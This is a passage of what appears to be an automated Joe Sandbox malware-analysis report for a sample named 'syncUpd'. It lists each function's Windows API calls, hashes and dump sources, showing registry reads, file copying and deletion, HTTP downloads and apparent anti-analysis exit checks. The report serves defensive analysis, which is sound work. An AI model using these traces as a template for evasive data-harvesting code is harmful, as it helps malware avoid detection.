                                                                                                                                                                                                                                                              • String ID: @$Z>A
                                                                                                                                                                                                                                                              • API String ID: 2950663791-2427737632
                                                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F6F07 Relevance: 10.6, APIs: 7, Instructions: 149registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F6F4B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008F6F71
                                                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008F6FE8
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DD64,00000000), ref: 008F7044
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008F7089
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 008F7090
                                                                                                                                                                                                                                                                • Part of subcall function 008F8E87: vsprintf_s.MSVCRT ref: 008F8EA2
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 008F718C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2698061284-0
                                                                                                                                                                                                                                                              • Opcode ID: 7f3f322cfc82e394cd4b1814abd93527b8f77dc1ed81e7b0c363f998f6c98cb9
                                                                                                                                                                                                                                                              • Instruction ID: 0e92f9229732ccc42a58fa8f3c2e78d07f4ef716ce96f5618970e5cd5e9ce0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f3f322cfc82e394cd4b1814abd93527b8f77dc1ed81e7b0c363f998f6c98cb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA610BB590415C9BEB24DB64CC45FE9B7B8FF48304F0081E9E649A6145DBB06BC9CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F1537 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F154E
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F14DB
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RtlAllocateHeap.NTDLL(00000000), ref: 008F14E2
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008F14FE
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008F151C
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegCloseKey.ADVAPI32(?), ref: 008F1526
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008F1576
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008F1583
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0042159C), ref: 008F159E
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008F168C
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008F1710
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F1737
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: lstrlen.KERNEL32(00000000), ref: 008F50B1
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F5122
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: StrCmpCA.SHLWAPI(?,00624C68), ref: 008F5140
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$CloseHeapLocalOpenmemset$AllocAllocateCopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2735668777-0
                                                                                                                                                                                                                                                              • Opcode ID: c8c279b3544a7551f314603e9532084fce410a271062ba78105d9905d8ac38f5
                                                                                                                                                                                                                                                              • Instruction ID: 7bbe3fa759d921de831f0ebc74a660eb52df80b48c6a3a700be2a66e43be7adb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8c279b3544a7551f314603e9532084fce410a271062ba78105d9905d8ac38f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C55101B1D442199FCB25FBA0DD96FEDB338AF94700F404199B60A621D1EE306B85CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F4ED7 Relevance: 10.6, APIs: 7, Instructions: 81networkmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008F4EF1
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F4EF8
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 008F4F11
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008F4F38
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008F4F68
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F4FDC
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F4FE9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3066467675-0
                                                                                                                                                                                                                                                              • Opcode ID: f2ce6417e6930b23450b1961e67bb297c29231f482b2b7d409ac886f68cddac0
                                                                                                                                                                                                                                                              • Instruction ID: 2aa50b16999c1a0471eea865d35950278aad387813115a0ecdfd26d093f13140
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2ce6417e6930b23450b1961e67bb297c29231f482b2b7d409ac886f68cddac0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231D6B4A4021CABDB20CF54DD85BEDB7B5FB88704F5081D9B709A7281DB706AC58F98
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903FF7 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00904005
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00904234,0041D28B), ref: 00904043
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00904091
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 009041E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 224852652-0
                                                                                                                                                                                                                                                              • Opcode ID: 1a26b6fa8bdaeb359c51be8f7994c2d1375265ef96f370ef8ce744ae01cba673
                                                                                                                                                                                                                                                              • Instruction ID: 076fcc9a4401bb9bb2eb4a526f775a35b47b0efa53054ff0527051f181340134
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a26b6fa8bdaeb359c51be8f7994c2d1375265ef96f370ef8ce744ae01cba673
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47517EF0D042199FDB64EB94DC85BEEB774EF98304F1041A9E615A72C1EB346A84CF58
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00964EE8,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00964A48,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964A60), ref: 00411E2B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                                                              • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                              • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00901FE7 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0090200C
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00624CBC,00000000,00020119,?), ref: 0090202B
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,006248D4,00000000,00000000,00000000,000000FF), ref: 0090204F
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00902059
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0090207E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624964), ref: 00902092
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                                                              • Opcode ID: 8539df6e52ea8c8c9330ac04aa026fc9553460f4399a595536ed05b40d02364f
                                                                                                                                                                                                                                                              • Instruction ID: 76589c14a20fb16111fa650004334cc0e4aaa023cf607e341d0359dfa5f336b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8539df6e52ea8c8c9330ac04aa026fc9553460f4399a595536ed05b40d02364f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7415272D0050CABDB15FBE0DD5AFEE777EAB89700F044548B7299A1C4EE7056848BE1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                              • String ID: X@
                                                                                                                                                                                                                                                              • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                                              • Opcode ID: 3bf91ae2e5e0c96664e3f183835cc73dd9238732a0ac8e0fae6ceee06b7d182d
                                                                                                                                                                                                                                                              • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bf91ae2e5e0c96664e3f183835cc73dd9238732a0ac8e0fae6ceee06b7d182d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00417BAE
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB
                                                                                                                                                                                                                                                                • Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                                                              • Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                                                              • Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903917 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A00), ref: 00906178
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624DA4), ref: 00906191
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624E10), ref: 009061A9
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A60), ref: 009061C1
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A4C), ref: 009061DA
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624AEC), ref: 009061F2
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624CB8), ref: 0090620A
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624B30), ref: 00906223
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624D84), ref: 0090623B
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624D28), ref: 00906253
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624BAC), ref: 0090626C
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624AE0), ref: 00906284
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624DD8), ref: 0090629C
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,006248B0), ref: 009062B5
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 008F13F7: ExitProcess.KERNEL32 ref: 008F1438
                                                                                                                                                                                                                                                                • Part of subcall function 008F1387: GetSystemInfo.KERNEL32(?), ref: 008F1391
                                                                                                                                                                                                                                                                • Part of subcall function 008F1387: ExitProcess.KERNEL32 ref: 008F13A5
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008F1352
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: VirtualAllocExNuma.KERNEL32(00000000), ref: 008F1359
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: ExitProcess.KERNEL32 ref: 008F136A
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008F1465
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: __aulldiv.LIBCMT ref: 008F147F
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: __aulldiv.LIBCMT ref: 008F148D
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: ExitProcess.KERNEL32 ref: 008F14BB
                                                                                                                                                                                                                                                                • Part of subcall function 00903697: GetUserDefaultLangID.KERNEL32 ref: 0090369B
                                                                                                                                                                                                                                                                • Part of subcall function 008F13B7: ExitProcess.KERNEL32 ref: 008F13ED
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: GetProcessHeap.KERNEL32(00000000,00000104,008F13DE,00624DE8), ref: 00904634
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: RtlAllocateHeap.NTDLL(00000000), ref: 0090463B
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: GetUserNameA.ADVAPI32(?,00000104), ref: 00904653
                                                                                                                                                                                                                                                                • Part of subcall function 00904667: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00904674
